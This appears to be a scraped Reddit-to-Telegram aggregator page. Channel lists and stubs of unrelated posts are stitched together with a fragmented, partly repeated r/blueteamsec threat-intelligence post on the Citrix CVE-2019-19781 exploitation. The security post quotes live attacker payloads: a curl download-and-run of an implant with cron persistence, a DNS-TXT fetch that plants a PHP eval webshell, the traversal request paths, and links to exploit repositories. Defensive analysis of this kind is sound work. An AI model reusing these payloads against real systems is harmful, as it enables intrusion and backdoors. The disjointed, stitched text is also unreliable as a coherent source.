-
Chat: @r_channels.
⬇️ All active channels:
01. @r_gifs
02. @r_jokes
03. @r_funny
04. @datascientology
05. @asiangirlsbeingcute
06. @r_behindthegifs
07. @pythondaily
08. @r_bitcoin
09. @RedditHistory
10. @news756
11. @r_pics_redux
12. @RedditCats
13. @r_til
14. @awwnime
15. @r_mlp
16. @ya_metro
17. @r_Showerthoughts
18. @r_me_irl
19. @r_dankmemes
20. @r_HighQualityGifs
21. @PoliticalHumor
22. @OldSchoolCool
23. @rddit
24. @denpasong
25. @reddit_all
26. @r_AskReddit
27. @r_explainmelikeimfive
28. @r_changemyview
29. @just_hmmm
30. @programmer_humor
31. @dailyfoodporn
32. @r_overwatch
33. @r_cryptocurrency
34. @r_listentothis
35. @r_ramen
36. @r_fantheories
37. @r_SlimeRancher
38. @r_googleplaydeals
39. @Indiancelebs
40. @r_pcmasterrace
41. @GIFFFs
42. @r_wow
43. @r_minecraft
44. @r_wholesomememes
45. @r_streetwear
46. @BetterEveryLoop
47. @reddit_fashion
48. @r_opensignups
49. @r_BigAnimeTiddies
50. @r_Damnthatsinteresting
51. @fakealbumcovers
52. @dash_cams
53. @r_mild
54. @r_porn
55. @r_formula1
56. @r_cpp
57. @r_gaming
58. @r_dontdeadopeninside
59. @r_linux
60. @reddit_android
61. @r_TechSupportGore
62. @r_indiaa
63. @r_dndgreentext
64. @r_dndmemes
65. @r_chemicalreactiongifs
66. @r_wheredidthesodago
67. @r_SwitchHacks
68. @r_books
69. @r_suggest
70. @r_space
71. @r_wasletztepreis
72. @r_greentext
73. @r_crappyoffbrands
74. @r_chemistry
75. @r_vim
76. @r_talesfromtechsupport
77. @r_PewdiepieSubmissions
78. @r_disneyvacation
79. @R_Punny
80. @r_mapporn
81. @r_softwaregore
82. @r_crappydesign
83. @r_comics
84. @r_remotejs
85. @streetmoe
86. @r_foxes
87. @r_digimon
88. @r_furry
89. @r_ik_ihe
90. @r_mildlyinfuriating
91. @r_Animemes
92. @r_wellthatsucks
93. @rtf2memes
94. @r_arma
95. @r_grandorder
96. @r_2meirl4meirl
97. @r_photoshopbattles
98. @r_pornhubcomments
99. @r_animeirl
100. @indepthstories
🔥 This seal has reached peak level of chill
102.9k upvotes
/r/NatureIsFuckingLit
2021 Jun 03
https://redd.it/nrote1
by @NatureIsLit
🏆 Great achievement!
💪 Milestone of 666 subscribers.
Live Betting - Live discussion for all your bets
Live Betting - Live discussion for all your bets
237 upvotes
/r/SoccerBetting
2022 Dec 28
https://redd.it/zx4oro
by @rsoccerbetting
🎂🎂🎂🎂🎂
🎁 Today @rsoccerbetting is 5 years old.
🎉 Congratulations! 🎈
[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
* SANS observed payloads
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/)
* SANS observe crypto miners on January 12th
* [https://twitter.com/sans\_isc/status/1216375320846176261](https://twitter.com/sans_isc/status/1216375320846176261)
* TrustedSec Honeypot analysis
* [https://www.trustedsec.com/blog/netscaler-honeypot/](https://www.trustedsec.com/blog/netscaler-honeypot/)
* AlienVault OTX pulse - [https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489](https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489)
* FireEye - [https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html](https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html)
* FireEye - NOTROBIN - [https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html](https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html)
* German Government [https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove\_bds/](https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/)
**Doozer Exploitation Intelligence**
[https://twitter.com/michel228/status/1216771783656910849](https://twitter.com/michel228/status/1216771783656910849)
Found this in the logs:
curl http://NN.NN.NN.NN:8081/2a9c665438cd0c8a9c4a25b2a6e0885f -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"
Payload dropped hash (SHA256): 177c3d8389c71065c2ff2e74ab190486ade95869f6655a1e544f5ee41334517e
This is a 2MB implant written in Go - uses AES, persistence via Cron etc.
[u/undermyne](https://www.reddit.com/u/undermyne/) **Exploitation Intelligence**
*I just spent a few hours cleaning up an exploited VPX for a customer. As observed below, the ns.conf was compromised (copied and I assume the copy was grabbed). The passwd file was also taken (nothing of import in that one) and the* *personalbookmark.pl* *file was modified. Following cleanup there were 5 active processes running under nobody and one of them would automatically restart. To be safe I reverted to a backup from prior to the exploit being released. Patched and returned to service and all is well. If the bind logs indicate that a file was deleted you can find the deleted file in the /var/tmp/netscaler/portal/templates directory (or other relevant tmp folders). The XML files are your best bet at trying to figure out what was attempted. Thankfully the 9 attempts on the one I just fixed looked like they were basically trying to sort out what they could and couldn't do. Start with the httpaccess log, then use time stamps to search bind logs, and then see what was done with the xml.ttc2 files in the tmp folders.*
**NCC Group/Fox-IT Exploitation Intelligence**
* Actor 1 observed January 11th we can see exploiting this vulnerability has the following log patterns (where the filename is a random alpha upper/lower case .xml). The attacker is observed using cron for persistence.
* Actor 1 observed January 12th changed their payload to drop a binary called netscalerd which is a coinminer
* [https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection](https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection)
​
POST /vpn/../vpns/portal/scripts/newbm.pl GET/vpn/../vpns/portal/XIaoLBFveLyvUfUGiWAwElIJNERhpmrBM.xml
* Actor 2 observed January 13 around 15:30 UTC (not clear if someone is
[https://x1sec.com/CVE-2019-19781-DFIR](https://x1sec.com/CVE-2019-19781-DFIR)
* via SSH - [https://twitter.com/cyb3rops/status/1215974764227039238](https://twitter.com/cyb3rops/status/1215974764227039238) (caveat: .. doesn't need to be in the URL in all exploitation scenarios)
​
ssh -t [address] 'grep -r "/../vpns" /var/log/http*'
**Vendor mitigation**
* [https://support.citrix.com/article/CTX267679](https://support.citrix.com/article/CTX267679)
* [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027)
Citrix have now (8pm UTC Jan 11) published when they expect patched builds to be available - from [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027) \- some are saying patches are available already to large clients
* 10.510.5.70.x 31st January 2020
* 11.111.1.63.x 20th January 2020
* 12.012.0.63.x 20th January 2020
* 12.112.1.55.x 27th January 2020
* 13.013.0.47.x 27th January 2020
Citrix blog by their CISO - [https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/)
**3rd party mitigation steps / advice**
* [https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway](https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway)
* [hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4" rel="nofollow">https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4](hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4" rel="nofollow">https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4)
* Palo Alto content version 8224 or newer.
* 8224 contains detection code for this CVE and will reset the connection before the vulnerability can be exploited. Resets are visible in the threat logs with a name of "Citrix Application Delivery Controller And Gateway Directory Traversal Vulnerability".
* Fortinet IPS 15.754 has a signature - default action is 'pass' though
* [https://fortiguard.com/encyclopedia/ips/48653](https://fortiguard.com/encyclopedia/ips/48653)
* from the comments by [u/ragogumi](https://www.reddit.com/u/ragogumi/)
* "*Fortinet IPS sig appears to be ineffective at detecting or mitigating. I've seen nothing in IPS logs related to this CVE - and cisagov checker, nessus scans and 3rd party red team attempts have not trigger IPS sensor, regardless of remediation state.*"
* Checkpoint released IPS protection too, 2020-01-12, "Citrix Multiple Products Directory Traversal (CVE-2019-19781)". Default action seems to be "Detect".
* [https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html](https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html)
**Details on how to exploit**
* [https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/](https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/)
* [https://github.com/jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781)
**Checkers**
* [https://github.com/cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) (USA Government)
* [https://github.com/mekoko/CVE-2019-19781](https://github.com/mekoko/CVE-2019-19781) (Chinese)
* [https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse](https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse) (nmap script)
* [https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse](https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse) (nmap script)
* [https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1](https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1) (PowerShell)
*
Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation
Last update: January 20 - 07:01 UTC/GMT
Patches Now Out for Some
Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up
Citrix blog post: Vulnerability Update: First permanent fixes available, timeline accelerated
ADC version 12.0: https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html
ADC version 11.1: https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html
Important
Citrix issued revised updates today
[https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/)
Fox-IT issued an analysis
https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf
Impact / Root Cause
remote pre-auth arbitrary command execution due to logic vuln i.e. reliable execution possible.
Products affected
Citrix ADC and Citrix Gateway version 13.0 all supported builds
Citrix ADC and NetScaler Gateway version 12.1 all supported builds
Citrix ADC and NetScaler Gateway version 12.0 all supported builds
Citrix ADC and NetScaler Gateway version 11.1 all supported builds
Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
Amazon Web Services - [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840)
At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id".
Background on the vulnerability
https://nvd.nist.gov/vuln/detail/CVE-2019-19781
[https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/)
Sigma rules
https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml
Snort rules
[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
Snort/Suricata rules
Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats
[https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/)
Exploitation Forensic Artifacts
https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
META DO NOT POST TRACKING NUMBERS OR SLIPS
You'll potentially reveal both your address and the other person's address along with other identification. We just had incidents where the seller's address, seller's full name, seller's phone number, buyer's address, buyer's full name, and other package-specific information was leaked.
It's a mess to clean up, as other websites archive comments with links, and even after we take down the offending comment, we still have to contact image hosting sites with takedown requests. The posting of this message was delayed until said image hosting site took down the image.
Your post will be removed and other consequences will be handed down. Doxxing someone, intentionally or not, is a serious offense.
43 upvotes
/r/thinkpadsforsale
2020 Apr 16
https://redd.it/g2ngcl
by @rthinkpadsforsale
🎂🎂🎂🎂🎂
🎁 Today @rthinkpadsforsale is 5 years old.
🎉 Congratulations! 🎈
First vs. Second Playthrough
8.6k upvotes
/r/DiscoElysium
2021 Apr 13
https://redd.it/mpsfre
by @r_DiscoElysium
#disco #discoelysium #hardcore #crpg #indiegames
🏆 Great achievement!
💪 Milestone of 10 subscribers.
Directed by Robert B. Tikka
4.7k upvotes
/r/islam
2021 Jan 13
https://redd.it/kwlztz
by @r_islam_channel
#islam
🏆 Great achievement!
💪 Milestone of 420 subscribers.
absolutelynotmeirl
41.6k upvotes
/r/absolutelynotme_irl
2019 Dec 31
https://redd.it/ehwhp1
by @notme_irl
🏆 Great achievement!
💪 Milestone of 42 subscribers.
[Art] Aki vs Katana Man (Chainsaw Man)
19.6k upvotes
/r/manga
2021 Jan 17
https://redd.it/kz3bhu
by @r_manga2
🎂
🎁 Today @r_manga2 is 1 year old.
🎉 Congratulations! 🎈
Unpredictable Hyderabad
5.2k upvotes
/r/hyderabad
2023 Nov 10
https://redd.it/17s1niq
by @rhyderabad
🎂🎂🎂
🎁 Today @rhyderabad is 3 years old.
🎉 Congratulations! 🎈
Religione
2.1k upvotes
/r/rimesegate
2021 Jan 04
https://redd.it/kq5ciu
by @r_rimesegate
🏆 Great achievement!
💪 Milestone of 69 subscribers.
Y'all are cool
1.0k upvotes
/r/fullegoism
2020 Mar 22
https://redd.it/fn6ocb
by @fullegoism
801. @r_mwiii
802. @r_emulation
803. @indiandankmemesreddit
804. @r_RedDeadOnline
805. @reddit_infographic
Weekend news
🎉 Welcome to newly active channels: @indiandankmemesreddit, @r_RedDeadOnline, @reddit_infographic. 🎈🎈
🏆 Channel of the week: @r_persona5. Join and enjoy!
🔥 Hottest channels of the week: @r_combatfootage, @r_propagandaposters, @loliconsunite.
🙋
Q: How can I help?
A: Support us on Patreon and promote your favorite channels!
Q: How to make similar channels?
A: Ask at @r_channels or use manual at https://github.com/Fillll/reddit2telegram.
Q: Where to donate?
A: Patreon: https://www.patreon.com/reddit2telegram. Other ways: https://bit.ly/r2t_donate.
Jared, the man behind the famous South Park WoW cosplay has passed away due to Covid-19. RIP
https://www.youtube.com/watch?v=C3I4wpHshuw&ab_channel=mirrodin14
148.1k upvotes
/r/videos
2021 Jan 03
https://redd.it/kpw1i4
by @redditvideos
🎂🎂🎂🎂🎂
🎁 Today @redditvideos is 5 years old.
🎉 Congratulations! 🎈
trolling)
​
./var/tmp/netscaler/portal/templates/REDACTED.xml.ttc2: $output .= $stash->get(['template', 0, 'new', [ { 'BLOCK' => 'exec(\'dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml\');' } ]]);
for the domain
Domain Name: IRANNETWORKTEAM.ORG Registry Domain ID: D402200000012341868-LROR Registrar WHOIS Server: whois.namesilo.com Registrar URL: www.namesilo.com Updated Date: 2020-01-11T14:17:00Z Creation Date: 2020-01-11T13:46:37Z
the TXT record for the domain currently returns
> set querytype=TXT > cmd.IRANNETWORKTEAM.ORG Non-authoritative answer: cmd.IRANNETWORKTEAM.ORG text = "<?php @eval(base64_decode(strrev(@$_POST[REDACTED])));?>"
So
* pull first stage from DNS TXT field
* uploads second/dynamic stage via POST in specific variable
This post is curated by the team at NCC Group/Fox-IT - [https://www.nccgroup.trust/](https://www.nccgroup.trust/uk/)
206 upvotes
/r/blueteamsec
2020 Jan 11
https://redd.it/en4m7j
by @r_blueteamsec
🎂🎂
🎁 Today @r_blueteamsec is 2 years old.
🎉 Congratulations! 🎈
[https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix\_CVE-2019-19781](https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix_CVE-2019-19781) (Russian - Windows Binary)
* [https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix\_netscaler\_rce\_cve\_2019\_19781.rb](https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix_netscaler_rce_cve_2019_19781.rb) Added to intrigue-core a week or so ago and then improved it when additional details came out by [u/jcran](https://www.reddit.com/u/jcran/)
* [securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77" rel="nofollow">https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77](securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77" rel="nofollow">https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77) OWASP's
* [https://github.com/x1sec/citrixmash\_scanner](https://github.com/x1sec/citrixmash_scanner)
**Commercial Checkers**
* [https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and](https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and) Tenable's
**Exploits**
* [https://github.com/projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781)
* [https://github.com/ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781)
* [https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py](https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py)
* [https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py](https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py)
* [https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55](https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55)
* [https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md](https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md)
* Exploitation possible with two GETs
* [https://twitter.com/mpgn\_x64/status/1216792205723041795](https://twitter.com/mpgn_x64/status/1216792205723041795)
* Exploitation possible without directory traversal
* [https://twitter.com/mpgn\_x64/status/1216802182760226817](https://twitter.com/mpgn_x64/status/1216802182760226817)
**Post Exploitation**
* [dozer.nz/citrix-decrypt/](https://t.co/xqCq1qHlp7?amp=1)
**Vulnerability Intelligence**
* [https://www.shodan.io/](https://www.shodan.io/) query: 'vuln:cve-2019-19781'
* [https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/](https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/) \- 25,000 endpoints vuln
* Alternate data sets as of 18:00 on the 12th suggest more
**Honeypot**
* [https://github.com/MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot)
**Exploitation Intelligence**
* Mass Scanning / Exploitation Observed on Jan 12th - [https://twitter.com/bad\_packets/status/1216291048185421830](https://twitter.com/bad_packets/status/1216291048185421830)
* Mass Exploitation Observed on Jan 10th - [https://twitter.com/bad\_packets/status/1215431625766424576](https://twitter.com/bad_packets/status/1215431625766424576)
* GreyNoise tagging - [https://twitter.com/GreyNoiseIO/status/1215818626055528453](https://twitter.com/GreyNoiseIO/status/1215818626055528453)
* [https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781](https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781)
* SANS honeypot uptick -
* 15:42 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1216022602436808704](https://twitter.com/sans_isc/status/1216022602436808704)
* 4:46 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1215857528749338624](https://twitter.com/sans_isc/status/1215857528749338624)
* Blog:
Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation
***Last update:*** January 20 - 07:01 UTC/GMT
**Patches Now Out for Some**
Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up
Citrix blog post: [Vulnerability Update: First permanent fixes available, timeline accelerated](https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/?mkt_tok=eyJpIjoiT1RVME56UXhOak00WWpnMyIsInQiOiI0NG9GcjY4Z09OS3ZKT3BcL21odWp6V25EcmdFR3lwMVNBWmhqTjlpR1hmbzlRSlhIXC9BSXJyK0NNMk9SdEdFMkw4cUl5Mk9MVnBkY1JxSGJLZithVjh3PT0ifQ%3D%3D)
ADC version 12.0: [https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html)
ADC version 11.1: [https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html)
**Important**
Citrix issued revised updates today
* [https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/)
Fox-IT issued an analysis
* [https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf](https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf)
**Impact / Root Cause**
remote pre-auth arbitrary command execution due to logic vuln i.e. reliable execution possible.
**Products affected**
* Citrix ADC and Citrix Gateway version 13.0 all supported builds
* Citrix ADC and NetScaler Gateway version 12.1 all supported builds
* Citrix ADC and NetScaler Gateway version 12.0 all supported builds
* Citrix ADC and NetScaler Gateway version 11.1 all supported builds
* Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
***Amazon Web Services*** *-* [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840)
At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id".
**Background on the vulnerability**
* [https://nvd.nist.gov/vuln/detail/CVE-2019-19781](https://nvd.nist.gov/vuln/detail/CVE-2019-19781)
* [https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/)
**Sigma rules**
* [https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml](https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml)
**Snort rules**
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
**Snort/Suricata rules**
* Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats
* [https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/)
**Exploitation Forensic Artifacts**
* [https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/](https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/?utm_content=112033384&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306)
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
*
Tamamo no mae
379 upvotes
/r/Tamamo
2021 Jun 11
https://redd.it/nx6nvc
by @r_tamamo
#tamamo #fate #fatego
🎂🎂
🎁 Today @r_tamamo is 2 years old.
🎉 Congratulations! 🎈
Don't know if memes are allowed here but here it is
1.9k upvotes
/r/algotrading
2022 Jan 27
https://redd.it/sdmlw7
by @r_algotrading
#algorithmic #trading #trade #stock #market
🎂🎂
🎁 Today @r_algotrading is 2 years old.
🎉 Congratulations! 🎈
Watson, Stone and Roberts Goddesses!
282 upvotes
/r/ChurchOfEmma
2021 Mar 01
https://redd.it/lv11db
by @r_churchofemma
🎂
🎁 Today @r_churchofemma is 1 year old.
🎉 Congratulations! 🎈
Si dice che ai tempi correva l'anno 2020
3.0k upvotes
/r/Ratorix
2020 Sep 21
https://redd.it/iwwxtc
by @r_Ratorix
🏆 Great achievement!
💪 Milestone of 50 subscribers.
Woke media strikes again 🤦♂️
7.1k upvotes
/r/OkBuddyFresca
2022 Aug 16
https://redd.it/wq92nc
by @r_okbuddyfresca
🎂
🎁 Today @r_okbuddyfresca is 1 year old.
🎉 Congratulations! 🎈
Found this online, is it true?
44.7k upvotes
/r/OnePiece
2023 Sep 05
https://redd.it/16a8tki
by @r_onepiecer
🎂
🎁 Today @r_onepiecer is 1 year old.
🎉 Congratulations! 🎈
In a protest against censorship, photographer A.L. Schafer staged this iconic photograph in 1934, violating as many rules as possible in one shot.
16.0k upvotes
/r/PropagandaPosters
2022 Oct 07
https://redd.it/xxwgz1
by @r_propagandaposters
#history #psychology #war #military #technology #propaganda
🏆 Great achievement!
💪 Milestone of 4000 subscribers.
Cona Ember
https://i.imgur.com/3gZ8wtz.jpg
5.6k upvotes
/r/streetmoe
2023 May 07
https://redd.it/13b58mc
by @streetmoe
🏆 Great achievement!
💪 Milestone of 800 subscribers.
Happy independence day everyone
9.4k upvotes
/r/Kerala
2023 Aug 14
https://redd.it/15r790c
by @r_kerala
🏆 Great achievement!
💪 Milestone of 300 subscribers.
701. @r_heraldry
702. @r_bolehland
703. @r_embedded
704. @r_kochin
705. @r_pinetime
706. @r_buildapcsales
707. @r_dalle2
708. @InstaIndia
709. @weirddalle
710. @r_indiandankmemes
711. @dailygratitudee
712. @r_riscv
713. @r_sweden
714. @rshittymoviedetails
715. @r_stray
716. @r_Padres
717. @r_redpillmalayalam
718. @rStableDiffusion
719. @r_chels
720. @uminekoreddit
721. @r_MWII
722. @brasildob
723. @r_Computers
724. @r_FemaleCelebrityBiceps
725. @GameplayMation
726. @fullegoism
727. @r_okbuddychicanery
728. @rAnarchism
729. @r_linuxmemes_1
730. @r_hamsters
731. @r_edgerunners
732. @Mapporncirclejerk
733. @r_askmen
734. @r_witcher3
735. @r_Ultrakill
736. @r_komisan
737. @r_PokemonRMXP
738. @r_ramiayana
739. @r_versus
740. @M2_D4
741. @r_tensei
742. @r_africa
743. @r_science
744. @r_scala
745. @r_onepiecer
746. @r_manga2
747. @r_okbuddyfresca
748. @r_churchofemma
749. @r_gharkekalesh
750. @r_punee
751. @DongistanSub
752. @r_psychology1
753. @r_Literaturememes
754. @r_MuscularCelebrities
755. @r_adhdmeme
756. @r_nijisanji
757. @r_ShitpostTC
758. @chainsawfolk
759. @r_dankinindia
760. @worldnewsvideo
761. @r_copypasta
762. @rExmuslim
763. @r_metalgearsolid
764. @r_thesilphroad
765. @env_chat
766. @r_0sanitymemes
767. @r_outerwilds
768. @r_tessafowler
769. @r_redfall
770. @OldSchoolRuneScape2007
771. @JEENEETardsReddit
772. @SubredditMix
773. @r_deathStranding
774. @rCarsIndia
775. @r_frankocean
776. @r_tylerthecreator
777. @r_playboicarti
778. @r_hiphopheads
779. @r_kendricklamar
780. @r_dotnet
781. @r_nvidia
782. @hub_posts
783. @r_shitposting0
784. @r_travis_scott
785. @passdenied
786. @JEENEETardsReddit2
787. @r_silenthill
788. @r_JapanPics
789. @r_GranTurismo
790. @rantitrampo
791. @r_PSX
792. @stablediffusion_r
793. @premierleague_r
794. @r_DiscoElysium
795. @reddit_argentina
796. @blue_archive_reddit
797. @r_ps3
798. @r_starfield
799. @r_ps2
800. @privacymemes1
